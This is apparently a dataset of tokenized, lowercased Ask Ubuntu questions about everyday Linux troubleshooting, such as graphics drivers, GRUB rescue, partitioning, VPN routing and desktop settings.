268922	can not install nvidia graphics driver	i have a fresh installation of ubuntu 12.10.when i tried to install nvidia drivers the following errors occurred . please help . can i use nvidia drivers with unity ? khat33b @ oa : ~ $ sudo apt-get install nvidia-current-updates [ sudo ] password for khat33b : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : nvidia-current-updates 0 upgraded , 1 newly installed , 0 to remove and 3 not upgraded . need to get 0 b/67.7 mb of archives . after this operation , 204 mb of additional disk space will be used . selecting previously unselected package nvidia-current-updates . ( reading database ... 155992 files and directories currently installed . ) unpacking nvidia-current-updates ( from ... /nvidia-current-updates_304.51-0ubuntu1_amd64.deb ) ... processing triggers for man-db ... setting up nvidia-current-updates ( 304.51-0ubuntu1 ) ... update-alternatives : using /usr/lib/nvidia-current-updates/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-alternatives : using /usr/lib/nvidia-current-updates/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) info : enable nvidia-current-updates debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : processing quirk thinkpad t420s debug : failure to match dell inc. with lenovo debug : quirk does n't match debug : processing quirk latitude e6530 debug : failure to match inspiron n5110 with latitude e6530 debug : quirk does n't match loading new nvidia-current-updates-304.51 dkms files ... building only for 3.5.0-17-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-17-generic i have dell inspiron n5110 , ram 3.8gb , processor intel® core™ i5-2430m cpu @ 2.40ghz × 4 , graphics is shown unknown , 64bit os . the result of lspci |grep vga is : khat33b @ oa : ~ $ lspci |grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) also , ubuntu has experienced an internal error window keeps on popping up . on clicking show details , the executable path is /usr/share/apport/apport-gpu-error-intel.py . there are also many other details.it 's a pretty huge list ! another window also appears : apport has detected a possible gpu hang . did your system recently lock up and/or require a hard reboot ?
268998	how do i interpret the output of the filefrag command ?	i have a dump file in my system that has confidential data in it . i tried using the filefrag command to open it . the output is : root @ sateesh935-sve15115enb : /home/sateesh935/desktop/g3 # filefrag -v dump filesystem type is : ef53 file size of dump is 267894784 ( 65404 blocks , blocksize 4096 ) ext logical physical expected length flags 0 0 3328000 6144 1 6144 3500032 3334144 32768 2 38912 3532800 26492 eof dump : 2 extents found what does the above output indicate ? how can i get the data from the dump file ? i will tell you the whole procedure which i have done . first i got the dump.enc file . to extract the the data from that i used the following command . openssl enc -d -aes-256-cbc -in dump.enc -out dumpl and it is encrypted by the aes-256 for that i have used a key and i extracted the file . now i got the dumpl file in which some data is there . but i do n't know how to see the data in that file .
269010	grub rescue problem	i 've been working with linux for a bit and have just recently tried ubuntu 12 and i prefer 11 . but , when i went to install 11 again , i screwed up and deleted the partition with ubuntu and have now lost my boot manager . i cant set my boot manager in my bios . i did install ubuntu alongside windows . i keep getting the grub rescue line and i do n't have a live disk anymore . i tried usb booting mint . and i ca n't boot it for some reason . all i want is to get back to my windows . any suggestions ?
269012	when i install on usb stick , will it replace windows 7 ?	i want ubuntu really bad on my usb stick but i am afraid to install it , because i wonder if it will replace windows .
269014	qml/qt development path verses `` quickly '' and gtk	it seems like recently the path ubuntu is moving towards is to have code developed with qml and qt , and that appears to sync with their move to be able to target tablets , phones , tv devices and the desktop . information on this can be found here : http : //developer.ubuntu.com/get-started/gomobile/ however , they also seem to be concurrently pushing quickly/python as the development platform for the desktop specifically and this relys on gtk , as can be seen here : http : //developer.ubuntu.com/get-started/ if i want my application to have longterm viability and to be portable across platforms which should i be investing my time in ? will qml/qt eventually be pushed as the ubuntu sdk solution and reliance on gtk be dropped , or will there be a move to broaden development choices by allowing gtk apps to be written in qml , and allow gtk to run on tablets and phones ? it would be helpful to know what the future roadmap is so developers do n't invest time and resources down a deadend path ...
269019	bootup error : grub rescue > unknown file system	previously , my system had windows 7 on it . i wanted to try ubuntu so i created a new 30gb partition in the h : drive in windows 7 and installed ubuntu in that ( but the partition did n't show up in windows ) . i then formatted my h : drive . now i am getting the error : grub rescue > unknown file system . if i use the `` ls '' command at the grub command prompt , i get ( hd0 ) ( hd0 , msdos11 ) ( hd0 , msdos10 ) ( hd0 , msdos9 ) ( hd0 , msdos8 ) ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos4 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( fd0 )
269023	cinnamon themes do n't show up in cinnamon settings	i 've been having an issue with trying to get a new theme working with cinnamon . i installed cinnamon using the following commands : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon i 've tried adding themes by adding creating a .themes folder in my home directory ( and moving the extracted theme files there ) , as well as moving the new themes to usr/share/themes folder as well . after attempting both of these solutions the only theme in cinnamon setting is still `` cinnamon '' . i 've having this issue on both my desktop that is running 12.04 and my laptop that is running 12.10 . what could be causing this issue ?
269030	how to check if my drivers are working properly ?	i have installed the driver nvidia from the nvidia web-site.. how can i check if these drivers are working ? thanks
269031	change or disable ubuntu global keyboard shortcut ( ctrl+alt+del ) using terminal without using ui	i want to disable or change the ctrl+alt+del key-shortcut in ubuntu 12.04 machine , without using the ui . because i removed x and there is no ui to change it . i just want to do it from terminal . please help thanks , swaminathan
269034	why does installing jre1.7.0 give me no alternatives ?	did : sudo update-alternatives -- install /usr/bin/java java /usr/lib/jvm/jre1.7.0/bin/java 1 then : sudo update-alternatives -- config java but i get : there is only one alternative in link group java ( providing /usr/bin/java ) : /usr/lib/jvm/jre1.7.0/bin/java nothing to configure . and bash : /usr/bin/java : no such file or directory i followed how can i install sun-oracles proprietary java ?
269035	geforce vs. radeon : which to choose for new ubuntu box ?	i 'm planning on buying a new video card for my ubuntu box . my current geforce 8600 gt gave me some problems with unity , so i want to ask , which is better , when considering stability and performance : nvidia geforce or amd radeon ( actually , i 'm thinking geforce gt 640 vs. radeon hd 7750 ) . i use my box for internet , movies and some games , plus i boot to windows occasionally to play games . i know there are other similar questions here , but all of them are 1-2 years old , and i want to know current state .
269036	ubuntu server is not routing a vtun vpn	i have an ubuntu 12.04 lte virtual server , kernel 2.6.32 , and a vpn with vtun running . in the vpn , the server is 6.6.6.6 , and the two clients are 6.6.6.29 and 6.6.6.35 . if i ping 6.6.6.6 from any client , the server responds immediately . so i believe clients are configured correctly . but if i ping 6.6.6.35 from 6.6.6.29 , or viceversa , there 's no response . a traceroute from 6.6.6.29 says : $ traceroute -n 6.6.6.35 traceroute to 6.6.6.35 ( 6.6.6.35 ) , 30 hops max , 60 byte packets 1 6.6.6.6 78.409 ms 80.202 ms 82.820 ms 2 * * * 3 * * * 4 * * * 5 * * * 6 * * * i guess there is a routing problem in the routing tables of the server . my config files are : $ cat /etc/default/vtun run_server=yes $ cat /etc/vtund.conf options { bindaddr { addr 85.84.83.82 ; } ; } default { type tun ; proto tcp ; persist yes ; keepalive yes ; stat yes ; multi yes ; } client1 { passwd u'dliketoknow ; up { ifconfig `` % % 6.6.6.6 pointopoint 6.6.6.29 mtu 1450 '' ; route `` add -net 6.6.6.0 netmask 255.255.255.0 gw 6.6.6.29 '' ; } ; down { ifconfig `` % % down '' ; route `` del -net 6.6.6.0 netmask 255.255.255.0 gw 6.6.6.29 '' ; } ; } client2 { passwd u'dliketoknow ; up { ifconfig `` % % 6.6.6.6 pointopoint 6.6.6.35 mtu 1450 '' ; route `` add -net 6.6.6.0 netmask 255.255.255.0 gw 6.6.6.35 '' ; } ; down { ifconfig `` % % down '' ; route `` del -net 6.6.6.0 netmask 255.255.255.0 gw 6.6.6.35 '' ; } ; } $ ifconfig tun0 link encap : unspec direcciónhw 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 direc . inet:6.6.6.6 p-t-p:6.6.6.29 másc:255.255.255.255 activo punto a punto funcionando noarp multicast mtu:1450 métrica:1 paquetes rx:358 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:18 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:500 bytes rx:27624 ( 27.6 kb ) tx bytes:1560 ( 1.5 kb ) tun1 link encap : unspec direcciónhw 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 direc . inet:6.6.6.6 p-t-p:6.6.6.35 másc:255.255.255.255 activo punto a punto funcionando noarp multicast mtu:1450 métrica:1 paquetes rx:98 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:91 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:500 bytes rx:10580 ( 10.5 kb ) tx bytes:8579 ( 8.5 kb ) $ route tabla de rutas ip del núcleo destino pasarela genmask indic métric ref uso interfaz 6.6.6.29 * 255.255.255.255 uh 0 0 0 tun0 6.6.6.35 * 255.255.255.255 uh 0 0 0 tun1 6.6.6.0 6.6.6.35 255.255.255.0 ug 0 0 0 tun1 6.6.6.0 6.6.6.29 255.255.255.0 ug 0 0 0 tun0 127.0.0.0 * 255.0.0.0 u 0 0 0 lo default * 0.0.0.0 u 0 0 0 venet0 but the most strange thing is that this problem appeared when i upgraded the server from version 10.04 lte to 12.04 lte . how can i rapair the routing table ? any other suggestions ?
269041	all ports are closed until they are opened manually by the user ? is it true ?	i am new to linux and ubuntu . i googled and read some articles stating that all ports are closed until they are opened manually by the user . is it correct ? and what do you mean by `` listening on a port '' and `` a port is established '' in simple terms ?
269042	re-install of ubuntu does not work on dell inspiron 14 ( 3421 )	i have a problem with my dell system which requires advice ! i have a dell inspiron 14 ( 3421 ) ( i5 , 1gb nvidia graphics , 4gb ram , etc . ) which came pre-installed with ubuntu 12.04lts . i made a dell ubuntu 12.04lts recovery disk as they prompted to me the first time i powered-on my system . then , i formatted the whole drive . then i installed my unused copy of win-7-pro-64bit . its working successfully without problems . i wanted to load ubuntu as the secondary dual boot os to my system with win-7 being primary . so i tried the following : 1 ) i used the dell ubuntu system recovery disk to install/load ubuntu 12.04 lts . in the setup interface i selected `` load and install only my ubuntu partitions '' . i created the ext4/ and swap for the installations , etc . everything went on up to some distance . but then the progress bar shows configuring and then setup stops and shows an error message that '' installation has stoped/encounterd a problem/will not continue , do you want to send error report ? '' i could n't proceed beyond that . why it is happening and how to solve it ? 2 ) next i downloaded the fresh ubuntu 12.04lts 64bit from the ubuntu website . i tied with usb installer and it proceeded some distance . but when i select the option install on hard drive/try ubuntu the screen goes blank and the same list of options appear again . why it is happening and how to solve it ? will installing the latest 12.10 will help in anyway ? why did'nt the dell ubuntu recovery disk work ? what should i do ?
269045	how to merge an unallocated partition with an extended partition ?	how can i merge an unallocated partition with an extended partition ? i 'm having trouble moving this unallocated space to the linux portion . here is my partition space :
269046	bash : delete from cursor till end of line with a keyboard shortcut	consider the following bash prompt , where ^ denotes the prompt location : # git commit -am `` [ bug 123456 ] do this and that with the bug '' ^ suppose that i want to commit again to the same bug , with a different commit message . is there a way to delete the text from the cursor position till the end of line ?
269055	ubuntu 12.04.2 not booting on a sony vaio laptop	i have a sony vaio e series laptop with uefi due to which i was unable to install ubutnu 12.04 on it , and installing the latest 12.10 was giving me brightness issues in which fn key combination to control the brightness was not working and the amd graphic drivers were all incompatible without any satisfying support from amd . so i decided to install ubuntu 12.04.2 the latest lts version and it was mentioned in the release notes that it is able to install on uefi enabled machine and there were not any issues mentioned on the launchpad regarding the brightness , so i decided to go on , but after the installation , on booting it is giving me a blank screen , though i can hear the booting sound . please help .
269060	problem acessing hmac file in the openssl library	i 'm trying to install openpana project ( https : //sourceforge.net/projects/openpana/ ) under my ubuntu 12.04 lts but it keeps generating an error . when i type ./configure it is telling me to install ssl or crypto although i 've installed both libraries . here 's the error : error ! you need to have ssl or crypto to continue . check which of these libraries contain the hmac function in your system and install it to continue openssl version gives openssl 1.0.1 14 mar 2012 once i go to usr/local/ssl/include/openssl i see that hmac.h file exists but seems like the system does not know how to access it !
269061	nautilus remote connect shows only first directory	i 've connected to remote server with ftp via nautilus ' remote connect . the result only shows the first directory in the remote server , opening the first directory shows only the first directory in that directory ... all the way until the last subdirectory - which is empty . when i connect using the same credentials via filezilla i am able to see the full directory listing . any ideas on why nautilus would be having this problem ?
269062	forcing alsa to use another codec	alsa detects my sound card to be a realtek alc1200 , but it is a realtek alc888s . this causes the sound to be lesser that that in my windows xp installation . so , is it possible to make alsa use the realtek alc888s codec instead of the realtek alc1200 codec ?
269063	how to check whether pciutils are installed in ubuntu or not ?	i have to implement one problem . which i have done in redhat to check pciutils using rpm -q pciutils command . but it 's failing for ubuntu as rpm command not found . my question , is there any generic command to check which pciutils versions are installed or even it 's installed or not for ubuntu of any version ?
269064	how do i update xubuntu 11.10 to xubuntu 12.04 lts ?	i am currently using xubuntu 11.10 and want to migrate to 12.04 lts ( xubuntu version ) as the support is ending in april . the upgrade option is only showing ubuntu 12.04 lts . how can i upgrade my current os to the required version ?
269066	which type of webcam to buy for skype v. 4.1.20 on ubuntu v. 12.10 ?	i got a laptop ( core 2 duo , 2 gb ram ) without a webcam and using ubuntu v. 12.10 os . as i wish to make skype video calls with my family i wish to buy a webcam . my budget is low , so i ca n't spent a lot on it . as i have n't found any webcam suggestions for the ubuntu 12.10 os , but only for earlier os versions , could you suggest me a webcam type ( s ) that i could use for skype v. 4.1.0.20 ? regards endre
269068	can not select gnome shell when logging in anymore 12.04	suddenly the `` gnome '' option when logging in to ubuntu disappeared . i have absolutely no idea why . apt-get remove gnome-shell & & apt-get install gnome-shell did n't have any effect .
269069	`` unspecified error '' when connecting camera on 64-bit ubuntu	i have a canon 40d that worked well with 32-bit ubuntu all the way from 10.04 through 12.04 . however , i switched to 64-bit 12.04 a while back , and since then , connecting the camera just brings up a simple dialog : unable to mount canon digital camera error initializing camera : -1 : unspecified error this problem persists in 12.10 and the latest 13.04 build . syslog does n't say much other than kernel : [ 12089.871412 ] usb 3-1 : new high-speed usb device number 3 using xhci_hcd mtp-probe : checking bus 3 , device 3 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 '' mtp-probe : bus : 3 , device : 3 was not an mtp device kernel : [ 12453.142322 ] usb 3-1 : usb disconnect , device number 3 i 've seen some random bugs on launchpad about this , but nothing that directly pertains to it . this seems like such a glaring problem that i figure i 'm doing something wrong on my end . what 's the proper way to get a camera to work on 64-bit ubuntu ?
269074	mp4 to mp3 conversion	i have worked on multiple tools that convert a `` mp4 '' file to `` mp3 '' format , but what i am really interested in , is there a way i can convert multiple mp4 files to mp3 format in a single go .
269078	how do i burn mp3 files in to a cd so i can listen them in my stereo ?	i have 65 music in mp3 format . i want to burn these music for a cd-r to play it with my stereo system . i have an ubuntu 12.04 .
269080	how can i prevent skype from starting automatically on boot ?	my girlfriend logged into her skype account from my xubuntu 12.10 netbook , and ever since then skype starts automatically every time i boot . how do i prevent this from happening ? things i 've tried : removing it from the settings manager- > session and startup- > application autostart - could n't find it in the list . checking for a relevant setting in skype itself - could n't find anything of the sort . ( i remember there was a similar skype setting somewhere whenever i 've used it on windows . considering my girlfriend is a windows user , could it be that this is a setting that 's available on the windows client but not on the linux one , and somehow got transferred ? ) using bum to turn it off - again , could n't find it in the list . uninstalling skype with apt-get remove skype -- purge and hoping that it removes all the settings as well - it did n't . save for reinstalling , what else can i try ? while on the same note - how is it possible for skype to autostart without going through the normal upstart route ? edit : couple of more things i tried : looking for anything similar in skype support - i did n't expect to find anything , and i did n't . looking through the .skype folder in my home directory . i did find a couple of files which looked promising ( .skype/shared.xml , .skype/ [ my username ] /config.xml , .skype/ [ girlfriend 's username ] /config.xml ) , but looking through them did n't yield anything . plenty of sqlite files though . could it be that this setting is somewhere within ?
269087	random ui language feature	i study several foreign languages at the same time and i would like to have a feature of random interface language switching during gui login . i find it easy and natural to learn languages that way , because i can easily `` guess '' the meaning of the most of ui menus , labels etc . just by their position in a `` fixed '' hierarchy . so the question is , is there an existing implementation of such a feature and , if not , how could one implement it ? is there a single global environment variable that should be changed in order to achieve the desired behaviour of ubuntu desktop gui ?
269089	error creating .deb file of amd catalyst driver	i was following the steps to install amd catalyst driver from wiki.cchtml.com . while i was creating the .deb file the following error occured -- $ sudo sh ./amd-driver-installer-catalyst-13.1-linux-x86.x86_64.run -- buildpkg ubuntu/precise created directory fglrx-install.jitivw verifying archive integrity ... all good . uncompressing amd catalyst ( tm ) proprietary driver-9.012 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ===================================================================== amd catalyst ( tm ) proprietary driver installer/packager ===================================================================== generating package : ubuntu/precise package build failed ! package build utility output : cleaning in directory . # refresh copyright file cat debian/copyright_stub_0 > debian/copyright cat usr/share/doc/fglrx/license.txt > > debian/copyright cat debian/copyright_stub_1 > > debian/copyright # remove any file generated from a template for file in *.in ; do \ # strip only the last .in from the name \ filename=`echo $ file | sed -e `` s|.in|| '' ` \ rm -f ; \ done dh clean dh_testdir dh_auto_clean dh_clean dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:9.012-0ubuntu1 dpkg-buildpackage : source changed by amd : advanced micro devices . < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.crghmg dpkg-buildpackage : host architecture i386 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g '' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/i386-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |9.012|g '' \ -e `` s| # srcxarch # |xpic|g '' \ -e `` s| # srcarch # |x86|g '' \ -e `` s| # srcotherarch # |x86_64|g '' \ -e `` s| # srclibdir # |lib|g '' \ -e `` s| # deb_host_multiarch # |i386-linux-gnu|g '' \ -e `` s| # other_arch # |x86_64-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86/usr/sbin \ arch/x86/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build dh_testdir dh_auto_configure dh_auto_build dh_auto_test dh build debian/rules binary # refresh copyright file cat debian/copyright_stub_0 > debian/copyright cat usr/share/doc/fglrx/license.txt > > debian/copyright cat debian/copyright_stub_1 > > debian/copyright # steps that we ca n't easily represent in debhelper files or .in files yet # remove any libraries that may be caught by shell expansion find . -name libgle* | xargs rm -f find . -name libegl* | xargs rm -f dh_installdirs -pfglrx # install the qt libraries dh_install -pfglrx `` arch/x86_64/usr/share/ati/lib '' `` usr/share/ati '' cp : can not stat `debian/tmp/arch/x86_64/usr/share/ati/lib ' : no such file or directory dh_install : cp -a debian/tmp/arch/x86_64/usr/share/ati/lib debian/fglrx/usr/share/ati/ returned exit code 1 make : *** [ binary-arch ] error 2 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 removing temporary directory : fglrx-install.jitivw please help me . i am using ubuntu 12.04 i386 . thanks in advance .
269090	keyboard volume shortcuts in xubuntu do n't work	i have a logitech k270 but i ca n't get the volume button shortcuts to work . actually when i click them , i see the popup on the top left of the window but the volume is not changed ... g @ g-on-linux : ~/lendlib $ uname -a linux g-on-linux 3.5.0-25-generic # 39-ubuntu smp mon feb 25 18:26:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux i am running xubuntu - xfce 4.10 .
269091	how to install sabrent usb to serial adapter drivers ?	i am really new to linux ubuntu 12.04 and just starting to figure things out , could someone give me a install guide for the sabrent sbt_usc6k usb to serial adapter . i have the install cd here with the drivers if needed
269092	ca n't resize main partition in xubuntu	i did a clean install of xubuntu that takes up the entire hdd . now i want to install backtrack 5 on another partition . i have tried gparted both in xubuntu and running gparted live booting from a usb stick . no matter what i try i ca n't seem to resize that mother . in gparted live from usb , no matter if the main ( and only partition besides the swap ) is activated or not , i can not move the side in the graphical partition editor nor enter a value in the numeral editor . i though it could be done when installing backtrack , but in `` advanced '' in partitioning i can only find the option to format the partition . anyone has a good idea how i can do this ? my xubuntu install is still fresh , so if i can get the option from a clean install to fully format and create several partitions while installing i can do that ?
269094	gwibber does n't work	i have linked two accounts to it : twitter that seems to work because it is authorised and facebook that does n't work at all , it is impossible to authorise : \ how to fix it ? thanks !
269095	no luck on installing .bin file ( for dell 32-bit diagnostics )	i 'm trying to install dell 32 bit diagnostics ( graphical user interface version ) to test my fans.. now..i download a file from dell which is meant for linux . the file format is : gnupg signature for linux update package i understand it sounds dumb but i have no idea what it means . i downloaded the .bin file . i have tried doing this : chmod a+x /file followed by sudo ./file with the file being of course the full path of the bin file.. ( /home/username/downloads/cl1386a0.bin ) i would get in response to that command not found from the terminal . how to i freaking install that dell diagnostics ? no help files regarding bin files on dell website..thanks dell ! o_o anyone care to help ? : )
269100	system settings has two online account icons ?	i have two online accounts icons in system settings . i 'm pretty sure it 's a bug . clicking the red one shows me my facebook account , clicking the blue shows nothing , so i can probably deduce those are different applications . is it possible that it 's related to my switch from unity to gnome-shell ? ( no other icon is doubling ) if it is , how/should i remove the unity version ?
269104	not able to change permission of a file to add +x	i am not able to understand what is the issue here ? vks @ vkstp : ~/dropbox/shells $ ll sssh.sh -rw-rw-rw- 1 root root 1218 mar 17 17:58 sssh.sh vks @ vkstp : ~/dropbox/shells $ sudo chmod +x sssh.sh vks @ vkstp : ~/dropbox/shells $ ll sssh.sh -rw-rw-rw- 1 root root 1218 mar 17 17:58 sssh.sh i am not able to change the permission of the to +x . edit : i have a dual boot machine , and i share the same dropbox folder . this dropbox folder is on a ntfs mount of my d drive for windows . following are the entries from fstab /dev/sda2 /mnt/c ntfs-3g rw , user , fmask=0111 , dmask=0000 0 0 /dev/sda3 /mnt/d ntfs-3g rw , user , fmask=0111 , dmask=0000 0 0 i am not able to add +x to anyfile in /mnt/d
269105	setting up xorg.conf metamodes for nvidia letterboxing	i 'm currently trying to configure my xorg.conf to letterbox screen resolutions smaller than the native resolution of my display ( 1680x1050 ) so that i can play older games full screen without distortion . i 've found that there is a way to do this , which involves adding metamodes to xorg.conf , but documentation is minimal so i 'm a little scared to start mucking with xorg.conf without further input . for the sake of example , say i have a game which runs at a native resolution of 1024x768 . what would i add in order to center and letterbox that ? here is my xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection and here are a couple links which might come in handy : a similar question : http : //www.nvnews.net/vbulletin/showthread.php ? t=184968 documentation : http : //us.download.nvidia.com/xfree86/linux-x86_64/302.17/readme/configtwinview.html # metamodes thanks !
269106	how can i install opencl in ubuntu 12.10 with a lenovo g570 laptop ?	is it possible , and if so , how do i install opencl drivers for a lenovo g570 's default graphics card ? edit : lenovo 's website says my graphics are intel速 hd graphics ( integrated ) .
269108	how do i show the pwd at the top of a terminal ?	how do i display my present working directory ( pwd ) at the top of a terminal ? i do not want the pwd in the body of the terminal . presently my ps1 is ! : .
269117	1:1 backup of system on usb thumb drive	i installed ubuntu 12.04 from a usb drive to a usb drive ( 16 gb ) and configured it to my needs . now i 'd like to have a 1:1 backup of the system on the usb drive and was wondering on how to accomplish that . i found dd seems to the trick ( how to replace my disk without having to rebuild my ubuntu install ? ) but i was wondering if i could run into any problems following this route . eg : do i have to preformat the target usb drive ? do i have to do something special regarding the boot loader ? can i run dd from within the running system ( with mounted source partitions and running processes ) ? i looked into the /etc/fstab and it included these lines : proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=77d02669-c088-4e3f-9a9c-4bb1bd6b1d05 / ext4 noatime , errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=ca609ad6-5690-4dc6-af78-edfd3a6d0b9b none swap sw 0 0 i guess those need to be changed when i want to boot from the backup drive ? any insight is welcome . thanks .
269118	problem installing ubuntu toshiba satellite p855-32u	i have a new laptop which runs win 8 ( uefi firmware ) , i want to install ubuntu 12.04.2 but i can not even make the liveusb start booting . i have test the usb in another laptop and i know it was created without problems . if i switch the boot mode in bios from uefi to csm , it does n't recognize the usb or the hdd . while booting if i press f12 sometimes it recognizes the usb sometimes not , but even when it does , if i select it the laptop boots to windows and just ignores the usb .
269122	listitem.subtitled id not defined error in qt sdk	i 've made a list displayed on tab page , its suppose display a subtitled list item : conversation ( an item that displays icon + text ) , i 've got a button that allows the user to change the text of that list item : conversation.text : `` '' however , whenever i 'm using it , qt displays an error stating that `` conversation is not defined '' when clearly i have defined it underneath , but for some reason the button is not being able to access or see it , so is there anyway to overcome this ? listview { id : conversationlist anchors.fill : parent model : 1 delegate : listitem.subtitled { id : conversation icon : qt.resolvedurl ( `` avatar_contacts_list.png '' ) } } thankyou : )
269124	serverprocesses ending with '-d ' ?	i just realized , that every serverprocess ends with a d ? like : apache : httpd mysql : mysqld unreal irc : unrealircd why is this ? is there any reason , or is it to recognize them from each other ?
269126	make linux look like windows 8	i have seen tutorials about making linux look like windows 7 , but is there a tutorial about making it look like windows 8 .
